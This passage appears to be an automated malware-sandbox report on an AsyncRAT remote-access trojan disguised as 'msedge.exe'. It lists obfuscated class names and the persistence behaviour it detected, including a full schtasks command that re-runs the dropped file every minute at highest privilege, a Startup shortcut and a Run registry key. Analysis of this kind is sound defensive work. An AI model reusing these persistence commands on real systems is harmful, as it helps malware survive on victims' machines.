Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	High entropy of concatenated method names: '_5BbpTl51Wq9dfGhYnTwOMDKobcARSIOgg7TuRLuXhVGnah64gbIEajDyGpIp', 'Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8', 'wAoM6WKp00mJueAI71AFGQ3wqmXEP1pkHB5b09APkIwa0SoeDuJ34CkTOFGQ', 'USt8b06QOt1ruuHADFiuw3w5WoBdzTUUpcO5AbeUoy9MfEr1FkzDRcm5C7Sq', 'A7jDnTxxZGVxJSM6ZVzIuNwT7kNj0ihGLvgPMHPRAt1NeuKD7gm7wDZPbOQg', 'PNT5WaMjY4feO0OxM7kSzb6uxsitzUNHIcPckUl31saejLw0RTeXSKYMUC08', 'NCaYkTTTQJ6httXPbitHIbeXIHkQi9IAA6ATnqWLbN7wdqrep65Sg8hOIvob', 'GzU0vI7e1qQqYVjgl474Qofwqv7jIJEjKfI9FNyHG8VlRYXagvbfYQEtlXdJ', 'xEeWYklEAxw0mi2thoDb2X3e3HLJ4VW5Ix9xJrpokTDMspWyLsKesm8NfegRvEGsnYY8PdfIZZWaYRoRMGlLyj686szu', 'Yz4zxI0GKfm2q0fiDsI92HeeRzFyyDOVHAGxKwYceqxs9nOYwpmJZMen9OZhNKaBiYyhzfSP0nCPQmSiRdEEmP6pFAPY'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, suAjnEJ1tn19sYA8ph0zWO4KI0IAS710e8IdvKQBnFouqwg41s12GOWadMmSoJWXgtPaLiwpYIUTm4RFU37TxMqWnbEW.cs	High entropy of concatenated method names: 'Es9h9uO628y5YKaAkQ7dnwRD30b3fxdzWedVfJCQYelDgDPkdvAjkPOyOqLTB3zYAs22uIUPOGSpXdzy1LJbOPn3pIyw', 'EEJmlnQQEokLnsYFc42', 'MZ1feRe9efQapqQVeeO', 'TZHGqLs9qB9WDqbGRmo', 'TghhsLbD2I8taVjfnXo'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, j4OBjGzsTyn926v13gfaBqAy3UG1OcemEb48CW43hFDL9Rhvuocla1V6yigq1u3yB2KPI83Dfnqe3F3Bjdz6jgdC3Cla.cs	High entropy of concatenated method names: 'Bc6jlvdLiV0eGEtQqUdB7tFmFG7MFYO0nqun0EbTqW3s9xIoMdyz1EELwRR2i0UeEktbcthSIcysLppLTCzTjD9NAusn', '_2LW9I7pYZ3b9EeFJhk327yLmRk5EeoCLfVONfhQkhnxfAC70YWEE8W2WDrB8nHUY2sEvjYgcBjz9DzkFINciGeRvHG3C', 'NwePAVtdHy11RKBkDvm', 'xbGWj78kFh9iVsGKXf1', 'njqZOXLiYN76Wwj0xvE', '_0PguuGyBRNJpE5Pw5SZ'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	High entropy of concatenated method names: '_1VTjDOLdCSMBa2movci95KiSGFSWpLfgnCxb822LlYdca0tRdXmSDMOfnnZ2aiOXLpLBqXHuPEaEjaiHANSrHYJg27am', 'Bm1rIHUShRqE8opCQLf', 'YSV46VLzzcCRjLwgvDZ', 'xyDSkenR4LTnO8VU9gZ', 'vdp4TAUeD1fktVjqvb2'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	High entropy of concatenated method names: '_13q2RwWL6kIdDpZIw5GHl1rQ3LGDf5pk2w4gX5i7a8YN1hzibxZrCrKncOQ4YJorJehilf00i1Uk3', '_1SlNo9r4dH6Xh2hpGrXad1Z7hVyq189HFbq17zwr6n4UrLJzOlIdS8MD9zd3jbVdCBMipX079gPrS', 'DfX3d8XCHeJXBfgwY9DYLb9MJV3sFfrk2Kb7YDsPYNHs3DpkyJMJRtdcmLCOSYQ0yOC9QfvtU5VIx', 'K8K9Uptmcx8N9bKMIudouOFVobs2MiRk3CpDRl0y8bJDvI7zPo2yyE7HblZiQPusApo3lm36KXLMm', '_2fnOX2a9wuPs69oCra5CqyxdF7pQa8WpnNWLpzxiXc1WrlMYdALUsCtgOKa9PsYWsW5Sq2yiDZkGw', 'YMrKRrkfsOT3HBzZWk07KMj14bj6JgDIsk9ymPQ59VViEQAYWsbVJX1tNvbuhKD1oDNealXlAhy1R', 'pYabpkxx09uAXCbSpMvQeovZUw2WDpPNQ92fWuR56kjJvxOAXfznd7S2ismB1s08n4AEy80tr8pYD', 'JAQQxburJhsr6ChC3StZT1JaDnllduJSJBYE073tMrS5IkQG0nGbqDAngBGiOM68J1m5eESWsAU3I', 'I1obCKB8xP1KjlKpQGdiUeGrHS3vEjY8kvwm2oM6Z3b0xNcGoWRvNesiOn2OAqM31glYTMfPXGKOl', 'QXb3jbSbeRJuBdhDWEt7BiFtO5p735MH7Ke30INhXB0F6JiDgFDLe2vKSYrJfJDy0ecVWkcDpXoyN'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	High entropy of concatenated method names: 'uzfZnNOIdl9ASznhBti6dboQGUqma4csnyt40Om4rHnaR8gBon8wo1R97NHd', 'SsGBh0oAZnPm54HCCLaOkCG4Lrbv74Wo5brscPTBJiQGm96MvIeF8WqunDFa', '_3XyJJJLx3AzBJXgjVLQCy8xcM42rXrJQNq4yyM3rNuh1SeizqwQ8gz9KTrz4', '_9PbgE1vnF2SIsxtso3JzCVhNXapaJAmRvSUj7jErjg4OrGnRQokKpvRveyfr', '_9zo2bjiCfoX22dVwaPQEfQGB5LtI5A1FiJZc8GIuGpX8mDJVmxNIuIcchikq', 'AC6POjmTSJSTzUzSaTPKLP0fQ9X8duqqecIyrV9ooXrHb7GmFR5leKnobNVL', 'ApnmwzOllDhlx7gWCX17rmuKPH77lZvf25oO44AWM0h30Yu7WdJiWbOxnhr4', 'CgzgAOIPBlBeXNNtnCxcBVeHJ0NnaC2t3PCwN9OpjWMxIkW15yrgd1L0K7T5', 'DVKx1JP01mCQmbiVDFdgndGq0yXkDTC9uuhxUsDFPs7n9xfeZvWJdFUPAX3t', 'NexAheQlgE8KiUjgQpt8YGIkhuK151Na2bjE654nWvetAbi5y2m29X5qiE1v'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, MsQTzqY2sBj0FbHgvJMxkq82mfk4SRkbM1aSfDlqrPA7a6lhdbMb3mFFZ2ztQ35vqL8QsrgUEv8telYizny7ghy9Nfmg.cs	High entropy of concatenated method names: 'BgWXOWgO0RI3t5W3oSY6ihW9vTBdo1stsBmrzvCZr1Gndmi7B753o71isrC995eT9o2QMOyI9PvSG9rHwAEDKsf8dIVh', 'mLrb28lDc45nuolIayy8ybvyvpu6hLudR8Lzj0L023E83hssFfe4Ma1eNEU7UdPjaWpijvP0kHSy9S65thBPTbeqCUJA', '_09DjBKmArthWJ7592zh4Ps65ujKWx9kewlgrDUdERDPv0YRVmLCPKE64IDx1Ku9e3U0FVLibmymsZ41ZDt9f8mBg2ESA', '_4bGBp8QE8O6JRdrtfU8RPYdGpdB74XBQFj8msmLm3LOx5AvRdiiH6oll9P0BHWylLDtg0fwrvXSjqzRHLQr3fkLXDnLw', 'pzhX0VehHDbIVhtQcfO78TfuwJfdU9GXKyHaZvT26sZpvkz4iUEqJAXiNx6lq92USmuqzNEmovRwUjcVfCg10D1wveTl', 'IIn8M8Ds6cnVUlcv1QgrKruk529mzUiWsXU1TOMMVBP5KAGcmR2e2l9KagPBglolMzhyOzlIKblMEll2IVe5wt33Klux', 'MlxLc2itlvfivBLwxTRK5ByiT33RF6B6hdUZvLb7BSxkuRVtwO0aQikTl07vLaQhcbsNIFTru6AApvXMdCusrd00BaFm', 'j5PRWDxSf9VSbACJNyT4nGG2qWvLnSfB12QggYX0rn7Py0GF86ndV5LzRkt4XuzgnmqzKCAXR3BQtMg2EJA5949r0c7t', '_7RH5Ghmd423QwIyVvETSrMc1o12jYW9ra0VF3ekwSgG6Ot1CEqYbA2o9yAzoOVIknD3fJZqaHVfBMWR9rsKuaHByakzK', 'X3fS1rnQNtUb0WjigIgKDW1OspnbNSJHE03MjnOHx2BJYgzvZFVrX63C5slydfAw6xktldugc6OlQbca6vw3YX9Db0i3'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, FH0T0lPJxmOipHaUauBOzt38ZrPAkacMeVaEICPqgm67LoA3gyNRBYagqZIL.cs	High entropy of concatenated method names: 'hNeG1c7oW4ipUj5sVSmEsWN55cTDnWsViXhKxYAkTbIS5t2fHkEBnrOdRJkN', 'htgGBQkkZ25Vt7aTvoDA9upspcYaatPrvBn7myCTBjxxdJEIc6cQxQPytM4v', '_28rXdbRVwM8xvJIu2LcOZcIN7mghtOewZ0s8beuoMFcTgPr7rSDe2H7uEMDi', 'JnB4EaOWCVK6CmXmNEkbssXGELYRSKUn68Yb3PXR28GmLF9o3Wbg64ynhFDC', '_96WilbUmS1C4eGEe5JH7B7W3XfAvAiZjNuPdCEjIjqaon9pkGDNrw5vAM37S', 'kaod4hQ3GNleMytR5Y0Ina4LOJU3ZQbpOS2vQPoppNpww3WCpTUewvjJAu5V', 'ddxZ2Rhemy7R2unOOsHOMpK8HzMvGjJ0eEikPrdXcaOZ5oyAxkfoafGFsd6f', 'KfU296howMWcLVz74PfISzC1tx9XuSZbFlPXVrT1iOBkWWCORUqwVwfNKrKccUs0cQoleOKXCIWXC', 'QeDrt88qROMXr706fEE0E1HpRIaJPj7hvIFLjVwYZFvlwOEQHm1vPX3JPJFCqtYiS4OZLIC0RJB5A', 'Ld8Rf0Ydv8y64HCHXnTLgAps4XD4i6O886QLjqWRolpqbSeh4kqkDpYc8tDsxDn4s09A9J2uF1jCZ'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, saLegFlLWIYnHSeWv3dKuvYxlBAXmTHWTTd8nhPEV0s8kgvX0KnK54sY3BzWxnqLHENZgXaI21laB.cs	High entropy of concatenated method names: 'sQSXmDnUDsAfju97T4GHND0Z0uVKgt2Mxqo7t5XH9S4wvY0PHwEzytrAFlLor6bpxNRGPJfjvHQ4K', 'Cpv5Bao84GFnCoXnGp3IjwCjhO1ve6BavihEqBd8Mg8gymfiuXSzAenMo2qtBL1I3tdV5WkLerfjP', '_25kPvP9OArsrcjPYqJfiilFphPvUjCmj4yixA6i6x3WwuPJUJCK0Ftu2TZf6RJf9KJbgTKpXoBgPh', 'LrEmMqWlTNaekZzNbYg', 'drEk8ukSJBhglopOpqN', 'F6jgVhJQSYaP8XzgGdS', 'GqXHztI9xiRouhGm5e1', 'unaqJKXMjH76iEVJpTp', 't9CYMR5x907eh9lbi4A', 'pitcvW4eeXhS3YNNwWP'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	High entropy of concatenated method names: '_9Bn08TCildwgGWw5ui1D1JlHKr9os8w8oiyRTCS75QEGPFy5vOOSEapjlIVJhGz5BKVc4flDBcVvd', 'lFz4ndxuaDtlpPLzecNUzgTpYa8CepDQ5low2qHA07cRu7f3X6Fn9eGrGm2svNSsH1l5nMWdIN5jb', 'cs5yxcWFG5GMivztSJVWFqFiK8zKDWtDZmYqW8o9tq4Bh5p6JTonUXIyyCwwvu3x0Bngn5AZcOVUs', 'utYPojQAhpBfQP2B0Pqcs5fkaIWNwrJw4RTiWES1ECtGG6Y4d7C4XdMeJLRDhKJwB6gqBrPwSS08Z'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, BQfk76GjfWbOZPmrXrjexbuBgHZzzc2HWRV3JskSba2ioac4wluteJ1owZLN.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tdUcGlOTclDzeVklQUy3QDoZHpgGp3D3cs4WriXkcSEkcgPxiJacMi0Ue0VsXnVzptfRGrwoYA7u5', 'P6BLTPLVpgDpgFiA02p2JkCngv2opgGniph3F2FUG890m8c3tDJsFubAwEB5fCaQWJfDH6p7zlJs2', 'btSJAEQsxcVaLmnVewMgeR6QEjjEOP6yp3vdHTEBaGY3JSoSVANQzN4ebIwfJb4PaMPOrVUSePRrv', 'FN0dHj8mqc6R9DJ2sw4FcVFCsxwX3gPZchRUH5UeCNgsZyoj9oj6UabBGse04kZSroRniqKt16Ggc'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, oki3W4coJSffso6AlSga3ltf5jf2RN6Nzg1npsOU6foKFkshYFENyg8TD1j4VyOJ5kUDBJDhf8T0TJCsZ5mHXmZahCyH.cs	High entropy of concatenated method names: '_4wqgx3rxACvqSTA5TnNFCZ02PTFNEADrSyZcLOFWU9V8p3sFKJ3CnIIFj7g2LZgxdLOyDzlEBH9AH7VGso5fTEgL080f', '_97AW74EnnjelP4PdcT4TH70NjYHSseZLGVKMRACKaUZlzXO0pidIkmboMKZFLIBoFPcsecGLtdf0ugAmWqZC1IFRnYND', '_3xGRxu1RSC26lPmgZf1xU2YD1Sf9hwNOGzBaz91Sd8x4w9KiFC9FDvGhu2LkQ51kvV6zBn0NBC2djcsVL3NhrlH5w0BM', 'eSafZIdZsDiuozAint9nzjfaD0MGjWVC2Pz4aud9EB5vW3cBcjW3KlNAUEtQngFmtujwiZsz0u1KGI6qnzvYaUM7wsJo', 'C3mWZB8wUT1oZ1tSOgF', 'Zx05wMg0LzrEBmHdApu', 'f9UVSBRdtQ3TmmzDXfe', 'q6JxcIobJVuC95ojoKh', 'lhK6vIs1xi2rDf9gkun', 'SlG6dwosjdQHqgo643M'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, x2DOmrf4aoRqGMh2z3QbaZVR6tr9eyzf2AOJ9ZTeCg7qSJkrAjXwddUDGjqXKhMmynIIMO5FArAKUC1xnYWktOfzNH34.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'e4kesvFTjsLd31DsTZZQHM6eMxdwqF3uNdLmQdc59AghcOvWdkE1VAb9zf2gDilmy1inF1fYCLT6wHCD7XICfGuX8CJ0', 'jJcD6g3ZYSJ8NyoOrmU', 'x2L7hDhLm3oJx9Gv3lF', '_4iucraCc2ilKQQVLJW3', 'B2bp9XS4UvQUERhXUxb'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	High entropy of concatenated method names: '_5BbpTl51Wq9dfGhYnTwOMDKobcARSIOgg7TuRLuXhVGnah64gbIEajDyGpIp', 'Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8', 'wAoM6WKp00mJueAI71AFGQ3wqmXEP1pkHB5b09APkIwa0SoeDuJ34CkTOFGQ', 'USt8b06QOt1ruuHADFiuw3w5WoBdzTUUpcO5AbeUoy9MfEr1FkzDRcm5C7Sq', 'A7jDnTxxZGVxJSM6ZVzIuNwT7kNj0ihGLvgPMHPRAt1NeuKD7gm7wDZPbOQg', 'PNT5WaMjY4feO0OxM7kSzb6uxsitzUNHIcPckUl31saejLw0RTeXSKYMUC08', 'NCaYkTTTQJ6httXPbitHIbeXIHkQi9IAA6ATnqWLbN7wdqrep65Sg8hOIvob', 'GzU0vI7e1qQqYVjgl474Qofwqv7jIJEjKfI9FNyHG8VlRYXagvbfYQEtlXdJ', 'xEeWYklEAxw0mi2thoDb2X3e3HLJ4VW5Ix9xJrpokTDMspWyLsKesm8NfegRvEGsnYY8PdfIZZWaYRoRMGlLyj686szu', 'Yz4zxI0GKfm2q0fiDsI92HeeRzFyyDOVHAGxKwYceqxs9nOYwpmJZMen9OZhNKaBiYyhzfSP0nCPQmSiRdEEmP6pFAPY'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, suAjnEJ1tn19sYA8ph0zWO4KI0IAS710e8IdvKQBnFouqwg41s12GOWadMmSoJWXgtPaLiwpYIUTm4RFU37TxMqWnbEW.cs	High entropy of concatenated method names: 'Es9h9uO628y5YKaAkQ7dnwRD30b3fxdzWedVfJCQYelDgDPkdvAjkPOyOqLTB3zYAs22uIUPOGSpXdzy1LJbOPn3pIyw', 'EEJmlnQQEokLnsYFc42', 'MZ1feRe9efQapqQVeeO', 'TZHGqLs9qB9WDqbGRmo', 'TghhsLbD2I8taVjfnXo'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, j4OBjGzsTyn926v13gfaBqAy3UG1OcemEb48CW43hFDL9Rhvuocla1V6yigq1u3yB2KPI83Dfnqe3F3Bjdz6jgdC3Cla.cs	High entropy of concatenated method names: 'Bc6jlvdLiV0eGEtQqUdB7tFmFG7MFYO0nqun0EbTqW3s9xIoMdyz1EELwRR2i0UeEktbcthSIcysLppLTCzTjD9NAusn', '_2LW9I7pYZ3b9EeFJhk327yLmRk5EeoCLfVONfhQkhnxfAC70YWEE8W2WDrB8nHUY2sEvjYgcBjz9DzkFINciGeRvHG3C', 'NwePAVtdHy11RKBkDvm', 'xbGWj78kFh9iVsGKXf1', 'njqZOXLiYN76Wwj0xvE', '_0PguuGyBRNJpE5Pw5SZ'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	High entropy of concatenated method names: '_1VTjDOLdCSMBa2movci95KiSGFSWpLfgnCxb822LlYdca0tRdXmSDMOfnnZ2aiOXLpLBqXHuPEaEjaiHANSrHYJg27am', 'Bm1rIHUShRqE8opCQLf', 'YSV46VLzzcCRjLwgvDZ', 'xyDSkenR4LTnO8VU9gZ', 'vdp4TAUeD1fktVjqvb2'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	High entropy of concatenated method names: '_13q2RwWL6kIdDpZIw5GHl1rQ3LGDf5pk2w4gX5i7a8YN1hzibxZrCrKncOQ4YJorJehilf00i1Uk3', '_1SlNo9r4dH6Xh2hpGrXad1Z7hVyq189HFbq17zwr6n4UrLJzOlIdS8MD9zd3jbVdCBMipX079gPrS', 'DfX3d8XCHeJXBfgwY9DYLb9MJV3sFfrk2Kb7YDsPYNHs3DpkyJMJRtdcmLCOSYQ0yOC9QfvtU5VIx', 'K8K9Uptmcx8N9bKMIudouOFVobs2MiRk3CpDRl0y8bJDvI7zPo2yyE7HblZiQPusApo3lm36KXLMm', '_2fnOX2a9wuPs69oCra5CqyxdF7pQa8WpnNWLpzxiXc1WrlMYdALUsCtgOKa9PsYWsW5Sq2yiDZkGw', 'YMrKRrkfsOT3HBzZWk07KMj14bj6JgDIsk9ymPQ59VViEQAYWsbVJX1tNvbuhKD1oDNealXlAhy1R', 'pYabpkxx09uAXCbSpMvQeovZUw2WDpPNQ92fWuR56kjJvxOAXfznd7S2ismB1s08n4AEy80tr8pYD', 'JAQQxburJhsr6ChC3StZT1JaDnllduJSJBYE073tMrS5IkQG0nGbqDAngBGiOM68J1m5eESWsAU3I', 'I1obCKB8xP1KjlKpQGdiUeGrHS3vEjY8kvwm2oM6Z3b0xNcGoWRvNesiOn2OAqM31glYTMfPXGKOl', 'QXb3jbSbeRJuBdhDWEt7BiFtO5p735MH7Ke30INhXB0F6JiDgFDLe2vKSYrJfJDy0ecVWkcDpXoyN'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	High entropy of concatenated method names: 'uzfZnNOIdl9ASznhBti6dboQGUqma4csnyt40Om4rHnaR8gBon8wo1R97NHd', 'SsGBh0oAZnPm54HCCLaOkCG4Lrbv74Wo5brscPTBJiQGm96MvIeF8WqunDFa', '_3XyJJJLx3AzBJXgjVLQCy8xcM42rXrJQNq4yyM3rNuh1SeizqwQ8gz9KTrz4', '_9PbgE1vnF2SIsxtso3JzCVhNXapaJAmRvSUj7jErjg4OrGnRQokKpvRveyfr', '_9zo2bjiCfoX22dVwaPQEfQGB5LtI5A1FiJZc8GIuGpX8mDJVmxNIuIcchikq', 'AC6POjmTSJSTzUzSaTPKLP0fQ9X8duqqecIyrV9ooXrHb7GmFR5leKnobNVL', 'ApnmwzOllDhlx7gWCX17rmuKPH77lZvf25oO44AWM0h30Yu7WdJiWbOxnhr4', 'CgzgAOIPBlBeXNNtnCxcBVeHJ0NnaC2t3PCwN9OpjWMxIkW15yrgd1L0K7T5', 'DVKx1JP01mCQmbiVDFdgndGq0yXkDTC9uuhxUsDFPs7n9xfeZvWJdFUPAX3t', 'NexAheQlgE8KiUjgQpt8YGIkhuK151Na2bjE654nWvetAbi5y2m29X5qiE1v'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, MsQTzqY2sBj0FbHgvJMxkq82mfk4SRkbM1aSfDlqrPA7a6lhdbMb3mFFZ2ztQ35vqL8QsrgUEv8telYizny7ghy9Nfmg.cs	High entropy of concatenated method names: 'BgWXOWgO0RI3t5W3oSY6ihW9vTBdo1stsBmrzvCZr1Gndmi7B753o71isrC995eT9o2QMOyI9PvSG9rHwAEDKsf8dIVh', 'mLrb28lDc45nuolIayy8ybvyvpu6hLudR8Lzj0L023E83hssFfe4Ma1eNEU7UdPjaWpijvP0kHSy9S65thBPTbeqCUJA', '_09DjBKmArthWJ7592zh4Ps65ujKWx9kewlgrDUdERDPv0YRVmLCPKE64IDx1Ku9e3U0FVLibmymsZ41ZDt9f8mBg2ESA', '_4bGBp8QE8O6JRdrtfU8RPYdGpdB74XBQFj8msmLm3LOx5AvRdiiH6oll9P0BHWylLDtg0fwrvXSjqzRHLQr3fkLXDnLw', 'pzhX0VehHDbIVhtQcfO78TfuwJfdU9GXKyHaZvT26sZpvkz4iUEqJAXiNx6lq92USmuqzNEmovRwUjcVfCg10D1wveTl', 'IIn8M8Ds6cnVUlcv1QgrKruk529mzUiWsXU1TOMMVBP5KAGcmR2e2l9KagPBglolMzhyOzlIKblMEll2IVe5wt33Klux', 'MlxLc2itlvfivBLwxTRK5ByiT33RF6B6hdUZvLb7BSxkuRVtwO0aQikTl07vLaQhcbsNIFTru6AApvXMdCusrd00BaFm', 'j5PRWDxSf9VSbACJNyT4nGG2qWvLnSfB12QggYX0rn7Py0GF86ndV5LzRkt4XuzgnmqzKCAXR3BQtMg2EJA5949r0c7t', '_7RH5Ghmd423QwIyVvETSrMc1o12jYW9ra0VF3ekwSgG6Ot1CEqYbA2o9yAzoOVIknD3fJZqaHVfBMWR9rsKuaHByakzK', 'X3fS1rnQNtUb0WjigIgKDW1OspnbNSJHE03MjnOHx2BJYgzvZFVrX63C5slydfAw6xktldugc6OlQbca6vw3YX9Db0i3'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, FH0T0lPJxmOipHaUauBOzt38ZrPAkacMeVaEICPqgm67LoA3gyNRBYagqZIL.cs	High entropy of concatenated method names: 'hNeG1c7oW4ipUj5sVSmEsWN55cTDnWsViXhKxYAkTbIS5t2fHkEBnrOdRJkN', 'htgGBQkkZ25Vt7aTvoDA9upspcYaatPrvBn7myCTBjxxdJEIc6cQxQPytM4v', '_28rXdbRVwM8xvJIu2LcOZcIN7mghtOewZ0s8beuoMFcTgPr7rSDe2H7uEMDi', 'JnB4EaOWCVK6CmXmNEkbssXGELYRSKUn68Yb3PXR28GmLF9o3Wbg64ynhFDC', '_96WilbUmS1C4eGEe5JH7B7W3XfAvAiZjNuPdCEjIjqaon9pkGDNrw5vAM37S', 'kaod4hQ3GNleMytR5Y0Ina4LOJU3ZQbpOS2vQPoppNpww3WCpTUewvjJAu5V', 'ddxZ2Rhemy7R2unOOsHOMpK8HzMvGjJ0eEikPrdXcaOZ5oyAxkfoafGFsd6f', 'KfU296howMWcLVz74PfISzC1tx9XuSZbFlPXVrT1iOBkWWCORUqwVwfNKrKccUs0cQoleOKXCIWXC', 'QeDrt88qROMXr706fEE0E1HpRIaJPj7hvIFLjVwYZFvlwOEQHm1vPX3JPJFCqtYiS4OZLIC0RJB5A', 'Ld8Rf0Ydv8y64HCHXnTLgAps4XD4i6O886QLjqWRolpqbSeh4kqkDpYc8tDsxDn4s09A9J2uF1jCZ'

Drops PE files

Source: C:\Users\user\Desktop\msedge.exe

File created: C:\Users\user\AppData\Local\msedge.exe

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\msedge.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Desktop\msedge.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\msedge.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge			Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge			Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\msedge.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
